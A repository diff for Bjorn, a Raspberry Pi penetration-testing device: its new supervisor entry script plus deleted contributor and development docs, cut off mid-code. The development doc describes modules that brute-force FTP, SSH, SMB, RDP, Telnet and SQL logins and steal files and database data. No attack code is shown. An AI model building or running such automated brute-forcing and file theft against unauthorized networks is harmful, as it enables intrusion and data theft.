├── Bjorn.py # Root program entry
├── orchestrator.py # Action consumer
├── shared.py # Shared memory
├── actions/ # Python modules containing attack/scan logic (dynamically loaded)
├── data/ # Stores bjorn.db and logs
├── web/ # HTML/JS/CSS files for the interface
└── resources/ # Images, fonts (.bmp, .ttf)
```
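The dynamic loading of `actions/` implied above could look like the following `importlib` sketch; the module-level `b_class` attribute naming each action's entry class is an assumed convention, not a documented API:

```python
import importlib
import pkgutil

def load_actions(package_name: str = "actions"):
    """Import every module under the package and collect its declared action class.

    Assumes each action module exposes a module-level ``b_class`` string naming
    the class to instantiate (an assumption for illustration).
    """
    actions = {}
    package = importlib.import_module(package_name)
    for info in pkgutil.iter_modules(package.__path__):
        module = importlib.import_module(f"{package_name}.{info.name}")
        class_name = getattr(module, "b_class", None)
        if class_name and hasattr(module, class_name):
            actions[class_name] = getattr(module, class_name)
    return actions
```

Dropping a new module into `actions/` is then enough for it to be picked up at startup, which is what makes the architecture extensible.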
-----
**Bjorn.py** (656 changed lines; diff hunk `@@ -1,173 +1,625 @@`, new version shown):

```python
# Bjorn.py
# Main entry point and supervisor for the Bjorn project
# Manages lifecycle of threads, health monitoring, and crash protection.
# OPTIMIZED FOR PI ZERO 2: Low CPU overhead, aggressive RAM management.
import logging
import os
import signal
import subprocess
import sys
import threading
import time
import gc
import tracemalloc
import atexit

from comment import Commentaireia
from display import Display, handle_exit_display
from init_shared import shared_data
from logger import Logger
from orchestrator import Orchestrator
from runtime_state_updater import RuntimeStateUpdater
from webapp import web_thread

logger = Logger(name="Bjorn.py", level=logging.DEBUG)

_shutdown_lock = threading.Lock()
_shutdown_started = False
_instance_lock_fd = None
_instance_lock_path = "/tmp/bjorn_160226.lock"

try:
    import fcntl
except Exception:
    fcntl = None


def _release_instance_lock():
    global _instance_lock_fd
    if _instance_lock_fd is None:
        return
    try:
        if fcntl is not None:
            try:
                fcntl.flock(_instance_lock_fd.fileno(), fcntl.LOCK_UN)
            except Exception:
                pass
        _instance_lock_fd.close()
    except Exception:
        pass
    _instance_lock_fd = None


def _acquire_instance_lock() -> bool:
    """Ensure only one Bjorn_160226 process can run at once."""
    global _instance_lock_fd
    if _instance_lock_fd is not None:
        return True
    try:
        fd = open(_instance_lock_path, "a+", encoding="utf-8")
    except Exception as exc:
        logger.error(f"Unable to open instance lock file {_instance_lock_path}: {exc}")
        return True
    if fcntl is None:
        _instance_lock_fd = fd
        return True
    try:
        fcntl.flock(fd.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
        fd.seek(0)
        fd.truncate()
        fd.write(str(os.getpid()))
        fd.flush()
    except OSError:
        try:
            fd.seek(0)
            owner_pid = fd.read().strip() or "unknown"
        except Exception:
            owner_pid = "unknown"
        logger.critical(f"Another Bjorn instance is already running (pid={owner_pid}).")
        try:
            fd.close()
        except Exception:
            pass
        return False
    _instance_lock_fd = fd
    return True


class HealthMonitor(threading.Thread):
    """Periodic runtime health logger (threads/fd/rss/queue/epd metrics)."""

    def __init__(self, shared_data_, interval_s: int = 60):
        super().__init__(daemon=True, name="HealthMonitor")
        self.shared_data = shared_data_
        self.interval_s = max(10, int(interval_s))
        self._stop_event = threading.Event()
        self._tm_prev_snapshot = None
        self._tm_last_report = 0.0

    def stop(self):
        self._stop_event.set()

    def _fd_count(self) -> int:
        try:
            return len(os.listdir("/proc/self/fd"))
        except Exception:
            return -1

    def _rss_kb(self) -> int:
        try:
            with open("/proc/self/status", "r", encoding="utf-8") as fh:
                for line in fh:
                    if line.startswith("VmRSS:"):
                        parts = line.split()
                        if len(parts) >= 2:
                            return int(parts[1])
        except Exception:
            pass
        return -1

    def _queue_counts(self):
        pending = running = scheduled = -1
        try:
            # Using query_one safe method from database
            row = self.shared_data.db.query_one(
                """
                SELECT
                    SUM(CASE WHEN status='pending' THEN 1 ELSE 0 END) AS pending,
                    SUM(CASE WHEN status='running' THEN 1 ELSE 0 END) AS running,
                    SUM(CASE WHEN status='scheduled' THEN 1 ELSE 0 END) AS scheduled
                FROM action_queue
                """
            )
            if row:
                pending = int(row.get("pending") or 0)
                running = int(row.get("running") or 0)
                scheduled = int(row.get("scheduled") or 0)
        except Exception as exc:
            logger.error_throttled(
                f"Health monitor queue count query failed: {exc}",
                key="health_queue_counts",
                interval_s=120,
            )
        return pending, running, scheduled

    def run(self):
        while not self._stop_event.wait(self.interval_s):
            try:
                threads = threading.enumerate()
                thread_count = len(threads)
                top_threads = ",".join(t.name for t in threads[:8])
                fd_count = self._fd_count()
                rss_kb = self._rss_kb()
                pending, running, scheduled = self._queue_counts()
                # Lock to safely read shared metrics without race conditions
                with self.shared_data.health_lock:
                    display_metrics = dict(getattr(self.shared_data, "display_runtime_metrics", {}) or {})
                epd_enabled = int(display_metrics.get("epd_enabled", 0))
                epd_failures = int(display_metrics.get("failed_updates", 0))
                epd_reinit = int(display_metrics.get("reinit_attempts", 0))
                epd_headless = int(display_metrics.get("headless", 0))
                epd_last_success = display_metrics.get("last_success_epoch", 0)
                logger.info(
                    "health "
                    f"thread_count={thread_count} "
                    f"rss_kb={rss_kb} "
                    f"queue_pending={pending} "
                    f"epd_failures={epd_failures} "
                    f"epd_reinit={epd_reinit} "
                )
                # Optional: tracemalloc report (only if enabled via PYTHONTRACEMALLOC or tracemalloc.start()).
                try:
                    if tracemalloc.is_tracing():
                        now = time.monotonic()
                        tm_interval = float(self.shared_data.config.get("tracemalloc_report_interval_s", 300) or 300)
                        if tm_interval > 0 and (now - self._tm_last_report) >= tm_interval:
                            self._tm_last_report = now
                            top_n = int(self.shared_data.config.get("tracemalloc_top_n", 10) or 10)
                            top_n = max(3, min(top_n, 25))
                            snap = tracemalloc.take_snapshot()
                            if self._tm_prev_snapshot is not None:
                                stats = snap.compare_to(self._tm_prev_snapshot, "lineno")[:top_n]
                                logger.info(f"mem_top (tracemalloc diff, top_n={top_n})")
                                for st in stats:
                                    logger.info(f"mem_top {st}")
                            else:
                                stats = snap.statistics("lineno")[:top_n]
                                logger.info(f"mem_top (tracemalloc, top_n={top_n})")
                                for st in stats:
                                    logger.info(f"mem_top {st}")
                            self._tm_prev_snapshot = snap
                except Exception as exc:
                    logger.error_throttled(
                        f"Health monitor tracemalloc failure: {exc}",
                        key="health_tracemalloc_error",
                        interval_s=300,
                    )
            except Exception as exc:
                logger.error_throttled(
                    f"Health monitor loop failure: {exc}",
                    key="health_loop_error",
                    interval_s=120,
                )


class Bjorn:
    """Main class for Bjorn. Manages orchestration lifecycle."""

    def __init__(self, shared_data_):
        self.shared_data = shared_data_
        self.commentaire_ia = Commentaireia()
        self.orchestrator_thread = None
        self.orchestrator = None
        self.network_connected = False
        self.wifi_connected = False
        self.previous_network_connected = None
        self._orch_lock = threading.Lock()
        self._last_net_check = 0  # Throttling for network scan
        self._last_orch_stop_attempt = 0.0

    def run(self):
        """Main loop for Bjorn. Waits for network and starts/stops Orchestrator based on mode."""
        if hasattr(self.shared_data, "startup_delay") and self.shared_data.startup_delay > 0:
            logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
            time.sleep(self.shared_data.startup_delay)
        backoff_s = 1.0
        while not self.shared_data.should_exit:
            try:
                # Manual mode must stop orchestration so the user keeps full control.
                if self.shared_data.operation_mode == "MANUAL":
                    # Avoid spamming stop requests if already stopped.
                    if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
                        self.stop_orchestrator()
                else:
                    self.check_and_start_orchestrator()
                time.sleep(5)
                backoff_s = 1.0  # Reset backoff on success
            except Exception as exc:
                logger.error(f"Bjorn main loop error: {exc}")
                logger.error_throttled(
                    "Bjorn main loop entering backoff due to repeated errors",
                    key="bjorn_main_loop_backoff",
                    interval_s=60,
                )
                time.sleep(backoff_s)
                backoff_s = min(backoff_s * 2.0, 30.0)

    def check_and_start_orchestrator(self):
        if self.shared_data.operation_mode == "MANUAL":
            return
        if self.is_network_connected():
            self.wifi_connected = True
            if self.orchestrator_thread is None or not self.orchestrator_thread.is_alive():
                self.start_orchestrator()
        else:
            self.wifi_connected = False
            logger.info_throttled(
                "Waiting for network connection to start Orchestrator...",
                key="bjorn_wait_network",
                interval_s=30,
            )

    def start_orchestrator(self):
        with self._orch_lock:
            # Re-check network inside lock
            if not self.network_connected:
                return
            if self.orchestrator_thread is not None and self.orchestrator_thread.is_alive():
                logger.debug("Orchestrator thread is already running.")
                return
            logger.info("Starting Orchestrator thread...")
            self.shared_data.orchestrator_should_exit = False
            self.orchestrator = Orchestrator()
            self.orchestrator_thread = threading.Thread(
                target=self.orchestrator.run,
                daemon=True,
                name="OrchestratorMain",
            )
            self.orchestrator_thread.start()
            logger.info("Orchestrator thread started.")

    def stop_orchestrator(self):
        with self._orch_lock:
            thread = self.orchestrator_thread
            if thread is None or not thread.is_alive():
                self.orchestrator_thread = None
                self.orchestrator = None
                return
            # Keep MANUAL sticky so supervisor does not auto-restart orchestration.
            try:
                self.shared_data.operation_mode = "MANUAL"
            except Exception:
                pass
            now = time.time()
            if now - self._last_orch_stop_attempt >= 10.0:
                logger.info("Stop requested: stopping Orchestrator")
                self._last_orch_stop_attempt = now
                self.shared_data.orchestrator_should_exit = True
                self.shared_data.queue_event.set()  # Wake up thread
                thread.join(timeout=10.0)
                if thread.is_alive():
                    logger.warning_throttled(
                        "Orchestrator thread did not stop gracefully",
                        key="orch_stop_not_graceful",
                        interval_s=20,
                    )
                    return
                self.orchestrator_thread = None
                self.orchestrator = None
                self.shared_data.bjorn_orch_status = "IDLE"
                self.shared_data.bjorn_status_text2 = ""

    def is_network_connected(self):
        """Checks for network connectivity with throttling and low-CPU checks."""
        now = time.time()
        # Throttling: Do not scan more than once every 10 seconds
        if now - self._last_net_check < 10:
            return self.network_connected
        self._last_net_check = now

        def interface_has_ip(interface_name):
            try:
                # OPTIMIZATION: Check /sys/class/net first to avoid spawning subprocess if interface doesn't exist
                if not os.path.exists(f"/sys/class/net/{interface_name}"):
                    return False
                # Check for IP address
                result = subprocess.run(
                    ["ip", "-4", "addr", "show", interface_name],
                    stdout=subprocess.PIPE,
                    stderr=subprocess.PIPE,
                    text=True,
                    timeout=2,
                )
                if result.returncode != 0:
                    return False
                return "inet " in result.stdout
            except Exception:
                return False

        eth_connected = interface_has_ip("eth0")
        wifi_connected = interface_has_ip("wlan0")
        self.network_connected = eth_connected or wifi_connected
        if self.network_connected != self.previous_network_connected:
            if self.network_connected:
                logger.info(f"Network status changed: Connected (eth0={eth_connected}, wlan0={wifi_connected})")
            else:
                logger.warning("Network status changed: Connection lost")
        self.previous_network_connected = self.network_connected
        return self.network_connected

    @staticmethod
    def start_display(old_display=None):
        # Ensure the previous Display's controller is fully stopped to release frames
        if old_display is not None:
            try:
                old_display.display_controller.stop(timeout=3.0)
            except Exception:
                pass
        display = Display(shared_data)
        display_thread = threading.Thread(
            target=display.run,
            daemon=True,
            name="DisplayMain",
        )
        display_thread.start()
        return display_thread, display


def _request_shutdown():
    """Signals all threads to stop."""
    shared_data.should_exit = True
    shared_data.orchestrator_should_exit = True
    shared_data.display_should_exit = True
    shared_data.webapp_should_exit = True
    shared_data.queue_event.set()


def handle_exit(
    sig,
    frame,
    display_thread,
    bjorn_thread,
    web_thread_obj,
    health_thread=None,
    runtime_state_thread=None,
    from_signal=False,
):
    global _shutdown_started
    with _shutdown_lock:
        if _shutdown_started:
            if from_signal:
                logger.warning("Forcing exit (SIGINT/SIGTERM received twice)")
                os._exit(130)
            return
        _shutdown_started = True
    logger.info(f"Shutdown signal received: {sig}")
    _request_shutdown()
    # 1. Stop Display (handles EPD cleanup)
    try:
        handle_exit_display(sig, frame, display_thread)
    except Exception:
        pass
    # 2. Stop Health Monitor
    try:
        if health_thread and hasattr(health_thread, "stop"):
            health_thread.stop()
    except Exception:
        pass
    # 2b. Stop Runtime State Updater
    try:
        if runtime_state_thread and hasattr(runtime_state_thread, "stop"):
            runtime_state_thread.stop()
    except Exception:
        pass
    # 3. Stop Web Server
    try:
        if web_thread_obj and hasattr(web_thread_obj, "shutdown"):
            web_thread_obj.shutdown()
    except Exception:
        pass
    # 4. Join all threads
    for thread in (display_thread, bjorn_thread, web_thread_obj, health_thread, runtime_state_thread):
        try:
            if thread and thread.is_alive():
                thread.join(timeout=5.0)
        except Exception:
            pass
    # 5. Close Database (Prevent corruption)
    try:
        if hasattr(shared_data, "db") and hasattr(shared_data.db, "close"):
            shared_data.db.close()
    except Exception as exc:
        logger.error(f"Database shutdown error: {exc}")
    logger.info("Bjorn stopped. Clean exit.")
    _release_instance_lock()
    if from_signal:
        sys.exit(0)


def _install_thread_excepthook():
    def _hook(args):
        logger.error(f"Unhandled thread exception: {args.thread.name} - {args.exc_type.__name__}: {args.exc_value}")
        # We don't force shutdown here to avoid killing the app on minor thread glitches,
        # unless it's critical. The Crash Shield will handle restarts.
    threading.excepthook = _hook


if __name__ == "__main__":
    if not _acquire_instance_lock():
        sys.exit(1)
    atexit.register(_release_instance_lock)
    _install_thread_excepthook()
    display_thread = None
    display_instance = None
    bjorn_thread = None
    health_thread = None
    runtime_state_thread = None
    last_gc_time = time.time()
    try:
        logger.info("Bjorn Startup: Loading config...")
        shared_data.load_config()
        logger.info("Starting Runtime State Updater...")
        runtime_state_thread = RuntimeStateUpdater(shared_data)
        runtime_state_thread.start()
        logger.info("Starting Display...")
        shared_data.display_should_exit = False
        display_thread, display_instance = Bjorn.start_display()
        logger.info("Starting Bjorn Core...")
        bjorn = Bjorn(shared_data)
        shared_data.bjorn_instance = bjorn
        bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
        bjorn_thread.start()
        if shared_data.config.get("websrv", False):
            logger.info("Starting Web Server...")
            if not web_thread.is_alive():
                web_thread.start()
        health_interval = int(shared_data.config.get("health_log_interval", 60))
        health_thread = HealthMonitor(shared_data, interval_s=health_interval)
        health_thread.start()
        # Signal Handlers
        exit_handler = lambda s, f: handle_exit(
            s,
            f,
            display_thread,
            bjorn_thread,
            web_thread,
            health_thread,
            runtime_state_thread,
            True,
        )
        signal.signal(signal.SIGINT, exit_handler)
        signal.signal(signal.SIGTERM, exit_handler)
        # --- SUPERVISOR LOOP (Crash Shield) ---
        restart_times = []
        max_restarts = 5
        restart_window_s = 300
        logger.info("Bjorn Supervisor running.")
        while not shared_data.should_exit:
            time.sleep(2)  # CPU Friendly polling
            now = time.time()
            # --- OPTIMIZATION: Periodic Garbage Collection ---
            # Forces cleanup of circular references and free RAM every 2 mins
            if now - last_gc_time > 120:
                gc.collect()
                last_gc_time = now
                logger.debug("System: Forced Garbage Collection executed.")
            # --- CRASH SHIELD: Bjorn Thread ---
            if bjorn_thread and not bjorn_thread.is_alive() and not shared_data.should_exit:
                restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
                restart_times.append(now)
                if len(restart_times) <= max_restarts:
                    logger.warning("Crash Shield: Restarting Bjorn Main Thread")
                    bjorn_thread = threading.Thread(target=bjorn.run, daemon=True, name="BjornMain")
                    bjorn_thread.start()
                else:
                    logger.critical("Crash Shield: Bjorn exceeded restart budget. Shutting down.")
                    _request_shutdown()
                    break
            # --- CRASH SHIELD: Display Thread ---
            if display_thread and not display_thread.is_alive() and not shared_data.should_exit:
                restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
                restart_times.append(now)
                if len(restart_times) <= max_restarts:
                    logger.warning("Crash Shield: Restarting Display Thread")
                    display_thread, display_instance = Bjorn.start_display(old_display=display_instance)
                else:
                    logger.critical("Crash Shield: Display exceeded restart budget. Shutting down.")
                    _request_shutdown()
                    break
            # --- CRASH SHIELD: Runtime State Updater ---
            if runtime_state_thread and not runtime_state_thread.is_alive() and not shared_data.should_exit:
                restart_times = [t for t in restart_times if (now - t) <= restart_window_s]
                restart_times.append(now)
                if len(restart_times) <= max_restarts:
                    logger.warning("Crash Shield: Restarting Runtime State Updater")
                    runtime_state_thread = RuntimeStateUpdater(shared_data)
                    runtime_state_thread.start()
                else:
                    logger.critical("Crash Shield: Runtime State Updater exceeded restart budget. Shutting down.")
                    _request_shutdown()
                    break
        # Exit cleanup
        if health_thread:
            health_thread.stop()
        if runtime_state_thread:
            runtime_state_thread.stop()
        handle_exit(
            signal.SIGTERM,
            None,
            display_thread,
            bjorn_thread,
            web_thread,
            health_thread,
            runtime_state_thread,
            False,
        )
    except Exception as exc:
        logger.critical(f"Critical bootstrap failure: {exc}")
        _request_shutdown()
        # Try to clean up anyway
        try:
            handle_exit(
                signal.SIGTERM,
                None,
                display_thread,
                bjorn_thread,
                web_thread,
                health_thread,
                runtime_state_thread,
                False,
            )
        except Exception:
            pass
        sys.exit(1)
```
@@ -1,40 +0,0 @@
# 📝 Code of Conduct
**Take Note About This...**
## 🤝 Our Commitment
We are committed to fostering an open and welcoming environment for all contributors. As such, everyone who participates in **Bjorn** is expected to adhere to the following code of conduct.
## 🌟 Expected Behavior
- **Respect:** Be respectful of differing viewpoints and experiences.
- **Constructive Feedback:** Provide constructive feedback and be open to receiving it.
- **Empathy and Kindness:** Show empathy and kindness towards other contributors.
- **Respect for Maintainers:** Respect the decisions of the maintainers.
- **Positive Intent:** Assume positive intent in interactions with others.
## 🚫 Unacceptable Behavior
- **Harassment or Discrimination:** Harassment or discrimination in any form.
- **Inappropriate Language or Imagery:** Use of inappropriate language or imagery.
- **Personal Attacks:** Personal attacks or insults.
- **Public or Private Harassment:** Public or private harassment.
## 📢 Reporting Misconduct
If you encounter any behavior that violates this code of conduct, please report it by contacting [bjorn-cyberviking@outlook.com](mailto:bjorn-cyberviking@outlook.com). All complaints will be reviewed and handled appropriately.
## ⚖️ Enforcement
Instances of unacceptable behavior may be addressed by the project maintainers, who are responsible for clarifying and enforcing this code of conduct. Violations may result in temporary or permanent bans from the project and related spaces.
## 🙏 Acknowledgments
This code of conduct is adapted from the [Contributor Covenant, version 2.0](https://www.contributor-covenant.org/version/2/0/code_of_conduct.html).
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.
@@ -1,51 +0,0 @@
# 🤝 Contributing to Bjorn
We welcome contributions to Bjorn! To make sure the process goes smoothly, please follow these guidelines:
## 📋 Code of Conduct
Please note that all participants in our project are expected to follow our [Code of Conduct](#-code-of-conduct). Make sure to review it before contributing.
## 🛠 How to Contribute
1. **Fork the repository**:
Fork the project to your GitHub account using the GitHub interface.
2. **Create a new branch**:
   Use a descriptive branch name for your feature or bugfix:
   `git checkout -b feature/your-feature-name`
3. **Make your changes**:
Implement your feature or fix the bug in your branch. Make sure to include tests where applicable and follow coding standards.
4. **Test your changes**:
   Run the test suite to ensure your changes don't break any functionality:
   - ...
5. **Commit your changes**:
   Use meaningful commit messages that explain what you have done:
   `git commit -m "Add feature/fix: Description of changes"`
6. **Push your changes**:
   Push your changes to your fork:
   `git push origin feature/your-feature-name`
7. **Submit a Pull Request**:
   Create a pull request on the main repository, detailing the changes you've made. Link any issues your changes resolve and provide context.
## 📑 Guidelines for Contributions
- **Lint your code** before submitting a pull request. We use [ESLint](https://eslint.org/) for frontend and [pylint](https://www.pylint.org/) for backend linting.
- Ensure **test coverage** for your code. Uncovered code may delay the approval process.
- Write clear, concise **commit messages**.
Thank you for helping improve Bjorn!
---
## 📜 License
2024 - Bjorn is distributed under the MIT License. For more details, please refer to the [LICENSE](LICENSE) file included in this repository.
@@ -1,373 +0,0 @@
# 🖲️ Bjorn Development
<p align="center">
<img src="https://github.com/user-attachments/assets/c5eb4cc1-0c3d-497d-9422-1614651a84ab" alt="thumbnail_IMG_0546" width="98">
</p>
## 📚 Table of Contents
- [Design](#-design)
- [Educational Aspects](#-educational-aspects)
- [Disclaimer](#-disclaimer)
- [Extensibility](#-extensibility)
- [Development Status](#-development-status)
- [Project Structure](#-project-structure)
- [Core Files](#-core-files)
- [Actions](#-actions)
- [Data Structure](#-data-structure)
- [Detailed Project Description](#-detailed-project-description)
- [Behaviour of Bjorn](#-behavior-of-bjorn)
- [Running Bjorn](#-running-bjorn)
- [Manual Start](#-manual-start)
- [Service Control](#-service-control)
- [Fresh Start](#-fresh-start)
- [Important Configuration Files](#-important-configuration-files)
- [Shared Configuration](#-shared-configuration-shared_configjson)
- [Actions Configuration](#-actions-configuration-actionsjson)
- [E-Paper Display Support](#-e-paper-display-support)
- [Ghosting Removed](#-ghosting-removed)
- [Development Guidelines](#-development-guidelines)
- [Adding New Actions](#-adding-new-actions)
- [Testing](#-testing)
- [Web Interface](#-web-interface)
- [Project Roadmap](#-project-roadmap)
- [Current Focus](#-future-plans)
- [Future Plans](#-future-plans)
- [License](#-license)
## 🎨 Design
- **Portability**: Self-contained and portable device, ideal for penetration testing.
- **Modularity**: Extensible architecture allowing addition of new actions.
- **Visual Interface**: The e-Paper HAT provides a visual interface for monitoring ongoing actions, displaying results or stats, and interacting with Bjorn.
## 📔 Educational Aspects
- **Learning Tool**: Designed as an educational tool to understand cybersecurity concepts and penetration testing techniques.
- **Practical Experience**: Provides a practical means for students and professionals to familiarize themselves with network security practices and vulnerability assessment tools.
## ✒️ Disclaimer
- **Ethical Use**: This project is strictly for educational purposes.
- **Responsibility**: The author and contributors disclaim any responsibility for misuse of Bjorn.
- **Legal Compliance**: Unauthorized use of this tool for malicious activities is prohibited and may be prosecuted by law.
## 🧩 Extensibility
- **Evolution**: The main purpose of Bjorn is to gain new actions and extend his arsenal over time.
- **Modularity**: Actions are designed to be modular and can be easily extended or modified to add new functionality.
- **Possibilities**: From capturing pcap files to cracking hashes, man-in-the-middle attacks, and more—the possibilities are endless.
- **Contribution**: It's up to the user to develop new actions and add them to the project.
## 🔦 Development Status
- **Project Status**: Ongoing development.
- **Current Version**: Scripted auto-installer, or manual installation. Not yet packaged with Raspberry Pi OS.
- **Reason**: The project is still in an early stage, requiring further development and debugging.
### 🗂️ Project Structure
```
Bjorn/
├── Bjorn.py
├── comment.py
├── display.py
├── epd_helper.py
├── init_shared.py
├── kill_port_8000.sh
├── logger.py
├── orchestrator.py
├── requirements.txt
├── shared.py
├── utils.py
├── webapp.py
├── __init__.py
├── actions/
│ ├── ftp_connector.py
│ ├── ssh_connector.py
│ ├── smb_connector.py
│ ├── rdp_connector.py
│ ├── telnet_connector.py
│ ├── sql_connector.py
│ ├── steal_files_ftp.py
│ ├── steal_files_ssh.py
│ ├── steal_files_smb.py
│ ├── steal_files_rdp.py
│ ├── steal_files_telnet.py
│ ├── steal_data_sql.py
│ ├── nmap_vuln_scanner.py
│ ├── scanning.py
│ └── __init__.py
├── backup/
│ ├── backups/
│ └── uploads/
├── config/
├── data/
│ ├── input/
│ │ └── dictionary/
│ ├── logs/
│ └── output/
│ ├── crackedpwd/
│ ├── data_stolen/
│ ├── scan_results/
│ ├── vulnerabilities/
│ └── zombies/
└── resources/
└── waveshare_epd/
```
### ⚓ Core Files
#### Bjorn.py
The main entry point for the application. It initializes and runs the main components, including the network scanner, orchestrator, display, and web server.
#### comment.py
Handles generating all the Bjorn comments displayed on the e-Paper HAT based on different themes/actions and statuses.
#### display.py
Manages the e-Paper HAT display, updating the screen with Bjorn character, the dialog/comments, and the current information such as network status, vulnerabilities, and various statistics.
#### epd_helper.py
Handles the low-level interactions with the e-Paper display hardware.
#### logger.py
Defines a custom logger with specific formatting and handlers for console and file logging. It also includes a custom log level for success messages.
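The custom success level mentioned above can be added to the standard `logging` module as follows; the numeric value 25 (between INFO at 20 and WARNING at 30) is a common choice, assumed here rather than taken from Bjorn's source:

```python
import logging

SUCCESS = 25  # between INFO (20) and WARNING (30)
logging.addLevelName(SUCCESS, "SUCCESS")

def _success(self, message, *args, **kwargs):
    """Log `message` at the custom SUCCESS level."""
    if self.isEnabledFor(SUCCESS):
        self._log(SUCCESS, message, args, **kwargs)

logging.Logger.success = _success  # every logger now has a .success() method
```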
#### orchestrator.py
Bjorn's AI, a heuristic engine that orchestrates the different actions such as network scanning, vulnerability scanning, attacks, and file stealing. It loads and executes actions based on the configuration and sets the status of the actions and Bjorn.
#### shared.py
Defines the `SharedData` class that holds configuration settings, paths, and methods for updating and managing shared data across different modules.
#### init_shared.py
Initializes shared data that is used across different modules. It loads the configuration and sets up necessary paths and variables.
#### utils.py
Contains utility functions used throughout the project.
#### webapp.py
Sets up and runs a web server to provide a web interface for changing settings, monitoring and interacting with Bjorn.
### ▶️ Actions
#### actions/scanning.py
Conducts network scanning to identify live hosts and open ports. It updates the network knowledge base (`netkb`) and generates scan results.
#### actions/nmap_vuln_scanner.py
Performs vulnerability scanning using Nmap. It parses the results and updates the vulnerability summary for each host.
#### Protocol Connectors
- **ftp_connector.py**: Brute-force attacks on FTP services.
- **ssh_connector.py**: Brute-force attacks on SSH services.
- **smb_connector.py**: Brute-force attacks on SMB services.
- **rdp_connector.py**: Brute-force attacks on RDP services.
- **telnet_connector.py**: Brute-force attacks on Telnet services.
- **sql_connector.py**: Brute-force attacks on SQL services.
#### File Stealing Modules
- **steal_files_ftp.py**: Steals files from FTP servers.
- **steal_files_smb.py**: Steals files from SMB shares.
- **steal_files_ssh.py**: Steals files from SSH servers.
- **steal_files_telnet.py**: Steals files from Telnet servers.
- **steal_data_sql.py**: Extracts data from SQL databases.
### 📇 Data Structure
#### Network Knowledge Base (netkb.csv)
Located at `data/netkb.csv`. Stores information about:
- Known hosts and their status (alive or offline).
- Open ports and vulnerabilities.
- Action execution history (success or failed).
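Since `netkb.csv` is a plain CSV file, it can be inspected with a few lines of Python. The column names below are illustrative only; check the header of your own `netkb.csv` for the real ones:

```python
import csv
import io

# Hypothetical netkb-style rows; the real data/netkb.csv header may differ.
SAMPLE = """MAC Address,IPs,Hostnames,Alive,Ports
00:11:22:33:44:55,192.168.1.100,server1,1,22;80;445
66:77:88:99:aa:bb,192.168.1.101,printer,0,
"""

def alive_hosts(csv_text):
    """Return the rows whose Alive flag is set, as dictionaries."""
    reader = csv.DictReader(io.StringIO(csv_text))
    return [row for row in reader if row["Alive"] == "1"]

for host in alive_hosts(SAMPLE):
    print(host["IPs"], host["Ports"])  # prints: 192.168.1.100 22;80;445
```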
**Preview Example:**
![netkb1](https://github.com/infinition/Bjorn/assets/37984399/f641a565-2765-4280-a7d7-5b25c30dcea5)
![netkb2](https://github.com/infinition/Bjorn/assets/37984399/f08114a2-d7d1-4f50-b1c4-a9939ba66056)
#### Scan Results
Located in `data/output/scan_results/`.
This file is regenerated every time the network is scanned. It is used to consolidate the scan data and update `netkb`.
**Example:**
![Scan result](https://github.com/infinition/Bjorn/assets/37984399/eb4a313a-f90c-4c43-b699-3678271886dc)
#### Live Status (livestatus.csv)
Contains real-time information displayed on the e-Paper HAT:
- Total number of known hosts.
- Currently alive hosts.
- Open ports count.
- Other runtime statistics.
## 📖 Detailed Project Description
### 👀 Behavior of Bjorn
Once launched, Bjorn performs the following steps:
1. **Initialization**: Loads configuration, initializes shared data, and sets up necessary components such as the e-Paper HAT display.
2. **Network Scanning**: Scans the network to identify live hosts and open ports. Updates the network knowledge base (`netkb`) with the results.
3. **Orchestration**: Orchestrates different actions based on the configuration and network knowledge base. This includes performing vulnerability scanning, attacks, and file stealing.
4. **Vulnerability Scanning**: Performs vulnerability scans on identified hosts and updates the vulnerability summary.
5. **Brute-Force Attacks and File Stealing**: Starts brute-force attacks and steals files based on the configuration criteria.
6. **Display Updates**: Continuously updates the e-Paper HAT display with current information such as network status, vulnerabilities, and various statistics. Bjorn also displays random comments based on different themes and statuses.
7. **Web Server**: Provides a web interface for monitoring and interacting with Bjorn.
## ▶️ Running Bjorn
### 📗 Manual Start
To start Bjorn manually, first make sure the service is stopped (`sudo systemctl stop bjorn.service`):
```bash
cd /home/bjorn/Bjorn
# Run Bjorn
sudo python Bjorn.py
```
### 🕹️ Service Control
Control the Bjorn service:
```bash
# Start Bjorn
sudo systemctl start bjorn.service
# Stop Bjorn
sudo systemctl stop bjorn.service
# Check status
sudo systemctl status bjorn.service
# View logs
sudo journalctl -u bjorn.service
```
### 🪄 Fresh Start
To reset Bjorn to a clean state:
```bash
sudo rm -rf /home/bjorn/Bjorn/config/*.json \
/home/bjorn/Bjorn/data/*.csv \
/home/bjorn/Bjorn/data/*.log \
/home/bjorn/Bjorn/data/output/data_stolen/* \
/home/bjorn/Bjorn/data/output/crackedpwd/* \
/home/bjorn/Bjorn/config/* \
/home/bjorn/Bjorn/data/output/scan_results/* \
/home/bjorn/Bjorn/__pycache__ \
/home/bjorn/Bjorn/config/__pycache__ \
/home/bjorn/Bjorn/data/__pycache__ \
/home/bjorn/Bjorn/actions/__pycache__ \
/home/bjorn/Bjorn/resources/__pycache__ \
/home/bjorn/Bjorn/web/__pycache__ \
/home/bjorn/Bjorn/*.log \
/home/bjorn/Bjorn/resources/waveshare_epd/__pycache__ \
/home/bjorn/Bjorn/data/logs/* \
/home/bjorn/Bjorn/data/output/vulnerabilities/*
```
Everything will be recreated automatically at the next launch of Bjorn.
## ❇️ Important Configuration Files
### 🔗 Shared Configuration (`shared_config.json`)
Defines various settings for Bjorn, including:
- Boolean settings (`manual_mode`, `websrv`, `debug_mode`, etc.).
- Time intervals and delays.
- Network settings.
- Port lists and blacklists.
These settings are accessible on the webpage.
### 🛠️ Actions Configuration (`actions.json`)
Lists the actions to be performed by Bjorn (regenerated dynamically from the contents of the `actions/` folder), including:
- Module and class definitions.
- Port assignments.
- Parent-child relationships.
- Action status definitions.
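As a rough sketch of how such an entry can drive dynamic loading, the snippet below resolves a module/class pair from a JSON entry with `importlib`. The key names (`b_module`, `b_class`, `b_port`) and the stdlib class used for the demo are assumptions for illustration, not the exact Bjorn schema:

```python
import importlib
import json

# A hypothetical actions.json entry; key names are illustrative only.
# The demo points at a stdlib class so the snippet runs anywhere.
entry_json = '{"b_module": "json", "b_class": "JSONDecoder", "b_port": 21}'

def resolve_action(entry_text):
    """Import the module named in the entry and return its action class."""
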